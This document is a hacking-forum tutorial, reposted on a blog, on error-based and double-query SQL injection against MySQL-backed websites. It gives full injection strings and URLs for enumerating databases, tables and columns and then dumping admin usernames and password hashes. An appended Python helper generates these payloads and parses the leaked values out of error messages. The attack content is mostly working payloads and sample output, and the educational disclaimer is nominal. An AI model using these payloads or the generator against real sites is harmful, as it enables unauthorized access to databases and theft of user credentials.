Monday, 13 May 2013

[TUT] Error Based and Double Query.


[TUT]SQL Injection - Error Based and Double Query.
« on: January 09, 2013, 03:28:58 PM »

Hello, Top-Hat-Security members.

This tutorial is purely for educational purposes!
Any misuse of my tutorials is at your own risk!


We will need a few things for this tutorial.
It's a lot more complicated than my last two tutorials.

1. Firefox: download the latest version of Firefox (for the Hackbar add-on).
2. Hackbar: install the Hackbar add-on in Firefox (to edit long attack vectors comfortably).
3. Any text editor (to paste the database information into).


First of all I would like to explain what error based SQL injection is,
and then explain the difference between error based and Double Query SQL Injection.


Error based:
By injecting a specific query, which I will show later in the tutorial, we make MySQL raise an error, and the application prints that error message on the page.
The message contains data we chose to put into it (version, database name, table contents), because we built the failing value ourselves. That is why we call this error based SQL injection. It only works when the page shows the raw database error text.


Double Query:
Works on exactly the same error as error based injection, but the part that triggers the error is wrapped in a nested subquery (a select inside a select, hence the name) that we append to the application's WHERE clause with and (...).
Either way we get the same kind of error message back.


That was a short explanation of error based and double query SQL Injection.
It should give you a basic idea of what we are dealing with!

Let's get started!

Determine when we should use error based or double query injection.

When you have done order by and got the column count <you can learn this method in my first tutorial>,
and you switch over to union select statements, the page returns an error such as:

Case 1:
Code:
The used SELECT statements have a different number of columns
Case 2:
Code:
Unknown column '1'
Case 3:
Nothing returns at all, and you cannot find the column markers anywhere in the web content.
Then you can also use error based injection.

These are the most common cases in which error based and double query injection are used: you cannot get the result of a UNION onto the page, but the page still prints the raw MySQL error text. Without that error text on the page neither technique works, and you have to fall back to blind injection.
Now that we know when to use this and you have a page with a case like that, let's move on!

Using Error based injection.
1. Get the MySQL Version.
2. Get the Database Name.
3. Get the Table Names.
4. Get the Column Names.
5. Extracting Information from the Columns.


Get the MySQL Version.

The query to get the MySQL version with error based injection is:
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
In URL:
Code:
http://www.[site].com/page.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
What does this line actually do?
concat_ws(0x3a,version(),floor(rand(0)*2)) builds the GROUP BY key out of the value we want to read (version()), a separator (0x3a is a colon) and floor(rand(0)*2). That last term is the trick: rand(0) is seeded, so it returns the same sequence on every call (0,1,1,0,1,1,...), and MySQL evaluates the group key once to look a group up in its temporary table and again when it inserts a new group. By the third row the insert collides with a group that already exists, and MySQL aborts with a duplicate-entry error whose message contains the whole key, version() included. The leading or 1 makes the WHERE clause match every row, which matters because the error only fires once at least three rows are grouped. The rest (having min(0) or 1--) only keeps the statement syntactically valid and comments out whatever the application appends.


Returned error message:
Code:
Duplicate entry '~'5.1.41'~1' for key 1
This means the web page runs MySQL version 5.1.41. The trailing 1 is the floor(rand(0)*2) value that was part of the group key, not part of the version string.
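Why floor(rand(0)*2) inside a GROUP BY ends in a duplicate-key error is easier to see in code than in prose. The following is an added example, not part of the original tutorial: it re-implements MySQL's RAND(seed) generator in Python (the linear congruential generator and constants from my_rnd_init()/my_rnd() in sql/item_func.cc) and models how MySQL fills the GROUP BY temporary table, evaluating the key once for the lookup and once more when a new group is inserted. The function names and the simplified temp-table model are mine; the rand sequence it produces for seed 0 is the one MySQL returns.

```python
from itertools import islice
from math import floor


class DuplicateEntry(Exception):
    """Stand-in for MySQL error 1062 (ER_DUP_ENTRY)."""


def mysql_rand(seed):
    """Reproduce MySQL's RAND(seed): the LCG from my_rnd_init()/my_rnd().
    Constants are the ones MySQL uses, so for a given seed this yields the
    same doubles RAND(seed) produces on the server (verified here for seed 0)."""
    max_value = 0x3FFFFFFF
    seed1 = (seed * 0x10001 + 55555555) % max_value
    seed2 = (seed * 0x10000001) % max_value
    while True:
        seed1 = (seed1 * 3 + seed2) % max_value
        seed2 = (seed1 + seed2 + 33) % max_value
        yield seed1 / max_value


def group_key_sequence(n, seed=0):
    """First n values of floor(rand(seed)*2); for seed 0 this is 0,1,1,0,1,1,..."""
    return [floor(r * 2) for r in islice(mysql_rand(seed), n)]


def simulate_group_by(row_count, seed=0):
    """Simplified model of MySQL filling the GROUP BY temporary table.
    For every source row the group-key expression is evaluated once to look
    the group up; if the group does not exist yet, the expression is evaluated
    AGAIN to build the row that gets inserted.  Because rand(0) advances on
    every evaluation, the inserted key can differ from the looked-up key and
    collide with a group that already exists -> error 1062.
    Returns {group_key: count} when no error is raised."""
    rng = mysql_rand(seed)
    groups = {}
    for _ in range(row_count):
        lookup_key = floor(next(rng) * 2)
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        insert_key = floor(next(rng) * 2)   # second evaluation of the same expression
        if insert_key in groups:
            raise DuplicateEntry(f"Duplicate entry '{insert_key}' for key 'group_key'")
        groups[insert_key] = 1
    return groups


def error_fires(row_count, seed=0):
    """True when grouping row_count rows by floor(rand(seed)*2) raises the error."""
    try:
        simulate_group_by(row_count, seed)
    except DuplicateEntry:
        return True
    return False


if __name__ == "__main__":
    print(group_key_sequence(6))                      # [0, 1, 1, 0, 1, 1]
    for rows in (1, 2, 3):
        print(rows, "rows ->", "error" if error_fires(rows) else "no error")
```

Walking through it: row 1 looks up key 0, finds nothing, and inserts key 1 (the second evaluation); row 2 looks up key 1 and finds it; row 3 looks up key 0, finds nothing, and tries to insert key 1 again, which already exists. That is why the payload needs a table with at least three rows to group over, and why information_schema.tables (which always has many rows) is the usual choice in the queries that follow.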


Get the Database Name.

To get the database name it's already a little more complicated.
First of all, there can be more than one database on a server; this query only returns the one the web application is connected to (listing all of them is covered in the Double Query section).

The query to get the current database name:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
In URL:
Code:
http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Look closely at this query. The innermost select returns database(), the schema the application is connected to. The limit 0,1 here is applied to the rows of information_schema.tables, not to a list of databases: database() has the same value on every row, so changing 0,1 to 1,1, 2,1 and so on returns the same name again until you run past the last table and get no error at all. It does not enumerate other databases. To list every schema on the server, select schema_name from information_schema.schemata and step through that with limit, as done in the Double Query section below.
Write the name down in your text editor; you will need it later in this tutorial.

What does this query tell us?
Inside concat we can nest a subquery, just as we nested version() before. Here that subquery returns database() cast to char (cast(... as char) makes sure the value is handled as a string so it concatenates cleanly) with a 0x7e (tilde) appended as a marker.
The outer select count(*) ... from information_schema.tables group by x is the same duplicate-entry trigger as before; information_schema is MySQL's metadata catalog, used here only because it always exists and has enough rows to group over.


Code:
Duplicate entry '~'Ignotus_1' for key 1
That means our database name is Ignotus_1.
Increasing the limit does not change the output, for the reason given above, so this alone tells us nothing about whether other databases exist.

Write down that database name you will be needing that name.


Get the Table Names

Now we are getting somewhere: the more difficult stuff, getting the table names.
Be sure to use the Hackbar, it makes editing these long payloads much easier.

The query to get the table names:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
In URL:
Code:
http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Yet again I use limit here; it is the only way to walk through all the tables with error based injection, one table name per request.
Increase the first number (0,1 then 1,1 then 2,1 and so on) until the error stops appearing: that means you have passed the last table.

As I said in my first tutorial, always look for useful tables: admin tables, member tables, users, anything to do with user credentials is interesting.
For black hats shop tables or payment sections are interesting as well, but I don't want to support black hatting!

What does this extremely long query tell us?
Using the select inside concat again, and casting table_name as char, we ask information_schema.tables for the names of the tables in the current database (where table_schema=database()).
That's the simplest explanation I can possibly give.


For limit 0,1:
Code:
Duplicate entry '~'tbl_news' for key 1
For limit 1,1:
Code:
Duplicate entry '~'tbl_gallery' for key 1
For limit 2,1:
Code:
Duplicate entry '~'tbl_userAdmins' for key 1
Finally something useful: tbl_userAdmins.
Now that we have an interesting table we want to extract information from it.


Get the Column Names

Yet another step further; this doesn't get any easier, and this is still regular error based, people.
SQL Injection is hard, you need your brains!

The query to extract the column names from a table:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Where it says TABLENAMEHERE we put our table name in hex, with 0x in front so MySQL reads it as a hex string literal. Writing the name as a hex literal means the payload contains no quote characters at all, which matters when the application escapes or strips quotes.
In the Hackbar go to Encoding and choose the hex option, or paste the table name into a text-to-hex tool such as http://www.swingnote.com/tools/texttohex.php. Note the limit behind our hex value.
We need this limit to step through all the columns, one per request. If the same table name exists in more than one database, also filter on table_schema=database() in the where clause, otherwise the columns of the other table get mixed in.

In URL:
Code:
http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now what does our query tell us?
We select column_name, cast as char, from information_schema.columns, but this time restricted to the table we named in hex,
with a limit to walk through all the columns in it.


My first error is:
Code:
Duplicate entry 'admin_NAME' for key 1
That gives us the admin name column we need. If you haven't got it yet, just increase the limit.
Next I need the password column, of course. For simplicity that is my next one.

Error message:
Code:
Duplicate entry 'admin_PWD' for key 1
Now we finally get to the fun part, where we get our admin name and password!

Extracting Information from the Columns.

Everyone likes this part, the part where we finally get to something!
Note that this is only half of the tutorial: we have only covered error based. Double Query comes after this part.


(Beware: where it says admin_NAME and admin_PWD you have to replace them with the username and password columns you extracted before.
Where it says tbl_userAdmins put the table name you extracted the columns from.
Almost forgot the database name, did you? This is where you need it. Where it says Ignotus_1 put your database name.)
Our query to extract information:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
In URL:
Code:
http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
What does this query tell us?
Inside cast we concat admin_NAME, 0x7e (a tilde, used as separator) and admin_PWD, so both values land in a single error message.
As char (as a string), from the table tbl_userADMINS in the database Ignotus_1, written as database.table. These are identifiers, not string values, so they are written plain (or in backticks), never as hex literals. Table names are case sensitive on Linux MySQL servers unless lower_case_table_names is set, so keep exactly the case you saw in the table list. The limit 0,1 picks the first row; increase it to read the other accounts.


Our error message:
Code:
Duplicate entry 'uSploit~4c0e8eb3ed67f58dc56e724e5297a598~1' for key 1
Congratulations, you have successfully exploited a website vulnerable to error based SQL Injection. (mouthful)
Username: uSploit
Password: 4c0e8eb3ed67f58dc56e724e5297a598 <-- this is an MD5 hash (32 hex characters; the ~1 after it is the rand value again). I won't teach you how to crack hashes.

Using Double Query Injection
1. Get the MySQL Version.
2. Get the Database Name.
3. Get the Table Names.
4. Get the Column Names.
5. Extracting Information from the Columns.

Short explanation:
I haven't explained this well so far, so I will take my time to make it clear.
This method triggers exactly the same duplicate-entry error as error based injection. The difference is in how the payload is packaged: the GROUP BY that causes the error runs inside a nested subquery, a select inside a select (hence the name), and that subquery is appended to the application's WHERE clause with and (...).
Because MySQL has to evaluate the subquery to decide whether the condition is true, the error fires no matter what the rest of the application's query looks like, and the message carries whatever we concatenated into the group key.
It is not a matter of overloading the server with two queries; the inner select is just a container that fails on purpose. You may have noticed that the queries from the database step onward in the error based part already used this nested form; only the version query there put the GROUP BY directly on the outer statement.


Get the MySQL Version.

Before you work your way to the end of this tutorial, compare the query below with the version query of the error based part.
The queries differ quite a bit, so don't mix them up.

Our query for the version (Double Query):
Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
In URL:
Code:
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now what does this extremely long query tell us?
We again build the group key with concat: 0x7e and 0x27 (tilde and single quote) as markers around the version, which is cast as char, followed by floor(rand(0)*2).
The inner select runs against information_schema.tables only because that table always exists and has enough rows. The and 1=1 at the end is just padding to keep the condition well formed; the error is raised while the subquery is evaluated, so the outer condition never gets to matter.


Error message:
Code:
Duplicate entry '5.1.65-cll' for key 1
It is a must to keep your queries clean; that is why I again advise the Hackbar, because one wrong character results in a syntax error that carries no information.
We don't want that to happen, do we :). Let's get the database name.

Get the Database Name.

This is our query to get the database names:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
In URL:
Code:
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
As you have seen in error based, the limit is important here if you want all the database names.

I won't be explaining everything as I usually do; I'll add what is new, which really reduces my writing time.
Here we select schema_name (the database name) from information_schema.schemata, which lists every database the connected user is allowed to see, cast as char. Increase only the first LIMIT (the one in capitals, directly after information_schema.schemata): 0,1 then 1,1 then 2,1 and so on until no error comes back, and you have all the database names. The lower-case limit 0,1 belongs to the container and stays as it is.

Error message:
Code:
Duplicate entry 'Ignotus_1' for key 1
Our database is Ignotus_1. Now it's important to write down the database name.


Get the Table Names.


Same as in error based, the queries get more difficult as we advance! Pay attention and you will pick this up.

!!Where it says 0xIgnotus_1 we need to put the database name in HEX (0x followed by the hex encoding of the name). The 0x in front is IMPORTANT!!
Our query to extract the table names:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xIgnotus_1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
In URL:
Code:
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xIgnotus_1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
As we have learned a few times now, the limit gets us all the tables. Keep increasing the first LIMIT in the query (the one behind our database name in hex) until you have them all.

Short explanation of what's new in the query:
We again want the table names, as char, in the error output,
this time from information_schema.tables filtered on table_schema = our database name in hex, with a limit to walk through them.


Now you should have a list of table names; look for a useful one.
Mine is USERS. Same as with error based, we now want the column names of that table.

Error message:
Code:
Duplicate entry 'USERS' for key 1

Get the Column Names.

!!Here we have to edit a few things again. Where it says 0xIgnotus_1 put your database name in HEX,
and where it says 0xUSERS put the table name you are going to use, also in HEX. Don't forget the 0x has to be there for MySQL to read it as a hex literal.!!

Another mind-blowing query for extracting the columns:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xIgnotus_1 AND table_name=0xUSERS LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
In URL:
Code:
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xIgnotus_1 AND table_name=0xUSERS LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Yet again there is a limit, the first one behind our table name in hex; increase it to get all the columns.

Short explanation of our new vector:
We want the column names from information_schema.columns, restricted to our database (table_schema, in hex) and to the table we chose (table_name, in hex).

Error message:
Code:
Duplicate entry 'Usernames' for key 1
Second error, after increasing the limit:
Code:
Duplicate entry 'Passwords' for key 1
Now we want to extract everything we can from these columns: username and password.

Extracting Information from the Columns.

Finally, finally and finally we are getting to the end; I am getting bored writing anyway!
This is the part where we get what we want!

!!First of all, a little bit of changing is needed in our query again.
Where it says `database_name`.table_name put your database name and table name (Ignotus_1.USERS in my case), and where it says USERS.Username put your table name and the column name. These are identifiers, not string values, so they go in plain (or in backticks), not in hex this time: MySQL only accepts a hex literal where a string value is expected, such as the table_schema=0x... comparisons above, never in place of a table or column name.
Written like this the query needs two runs, one for the username column and one for the password column; as in the error based part you can also concat both columns with 0x7e between them and get both in one error. LIMIT N,1 walks through the rows: N=0 is the first user, N=1 the second, and so on.!!

This is our query to extract the data from our columns:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(USERS.Username as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
In URL:
Code:
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(USERS.Username as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Error message:
Code:
Duplicate entry 'uSploit' for key 1
Now for the passwords we only need to change Username into Passwords and execute.
This results in an error providing us the password.

Error message:
Code:
Duplicate entry '4c0e8eb3ed67f58dc56e724e5297a598' for key 1
Username: uSploit
Password: 4c0e8eb3ed67f58dc56e724e5297a598
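Both halves of this tutorial repeat the same loop by hand: build a payload, hex-encode the string values it compares against, step LIMIT up by one, and read the value back out of the duplicate-entry text. The following Python helper is an added example, not part of the original tutorial, that does those steps for the error based and double query procedures above. The payload template follows the page's queries (count(*), floor(rand(0)*2), group by over information_schema.tables); the function names, the ~ framing of the value and the sample error strings are constructed for this example. It also makes the distinction the last step glosses over explicit: values compared in a WHERE clause can be hex literals, but the database, table and column names in FROM are identifiers and are quoted with backticks.

```python
import re

# Constructed sample error messages, in the shape of the tutorial's output
# (older MySQL prints "for key 1", newer builds print "for key 'group_key'").
SAMPLE_ERRORS = [
    "Duplicate entry '~'tbl_news'~1' for key 1",
    "Duplicate entry 'uSploit~4c0e8eb3ed67f58dc56e724e5297a598~1' for key 1",
    "Duplicate entry 'Ignotus_1' for key 'group_key'",
]

DUP_RE = re.compile(r"Duplicate entry '(.*)' for key")


def hexlit(s):
    """MySQL hex literal for a string VALUE, e.g. USERS -> 0x5553455253.
    Usable wherever a string is compared (table_schema=..., table_name=...) so the
    payload carries no quotes; it cannot stand in for an identifier in FROM."""
    return "0x" + s.encode("utf-8").hex()


def dup_payload(scalar_subquery):
    """Wrap a scalar subquery in the count(*)/rand(0)/group by container used
    throughout the tutorial.  The value is framed as ~value~ and followed by the
    floor(rand(0)*2) digit so parse_dup_entry() can pull it back out."""
    return ("and (select 1 from (select count(*),concat(0x7e,(" + scalar_subquery
            + "),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)")


def table_payload(offset, schema=None):
    """Name of the table at position `offset` in the given schema (default: database())."""
    where = "table_schema=" + (hexlit(schema) if schema else "database()")
    return dup_payload(f"select table_name from information_schema.tables "
                       f"where {where} limit {offset},1")


def column_payload(offset, table, schema=None):
    """Column at position `offset` of `table`; the schema filter avoids mixing in
    same-named tables from other databases."""
    where = "table_name=" + hexlit(table)
    where += " and table_schema=" + (hexlit(schema) if schema else "database()")
    return dup_payload(f"select column_name from information_schema.columns "
                       f"where {where} limit {offset},1")


def row_payload(offset, schema, table, *columns):
    """Dump one row: identifiers go in backticks (never hex); several columns are
    joined with 0x7e so one error message carries all of them."""
    cols = ",0x7e,".join(f"`{c}`" for c in columns)
    return dup_payload(f"select concat({cols}) from `{schema}`.`{table}` limit {offset},1")


def parse_dup_entry(error_text):
    """Recover the injected value from a duplicate-entry message: drop the trailing
    ~<rand digit>, then the ~ and ' framing.  Returns None for any other error."""
    m = DUP_RE.search(error_text)
    if not m:
        return None
    value = re.sub(r"~[01]$", "", m.group(1))   # strip the floor(rand(0)*2) group-key digit
    return value.strip("~'")


def split_fields(value):
    """Split a ~-joined multi-column value back into its columns."""
    return value.split("~")


if __name__ == "__main__":
    for n in range(3):                                   # step LIMIT 0,1 -> 1,1 -> 2,1
        print(table_payload(n))
    print(column_payload(0, "USERS", "Ignotus_1"))
    print(row_payload(0, "Ignotus_1", "USERS", "Username", "Passwords"))
    for err in SAMPLE_ERRORS:
        print(repr(err), "->", parse_dup_entry(err))
```

Stop stepping the offset when parse_dup_entry() returns None: past the last row the subquery yields NULL, the group key is NULL and no duplicate is produced, so the page comes back without an error. One further practical limit: MySQL truncates the value shown in the duplicate-entry message (commonly at 64 characters), so long fields have to be read in slices with substr() or mid() rather than in one go.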

That is enough ass hurting for today.
Thanks for taking your time, hope you enjoyed!
uSploit
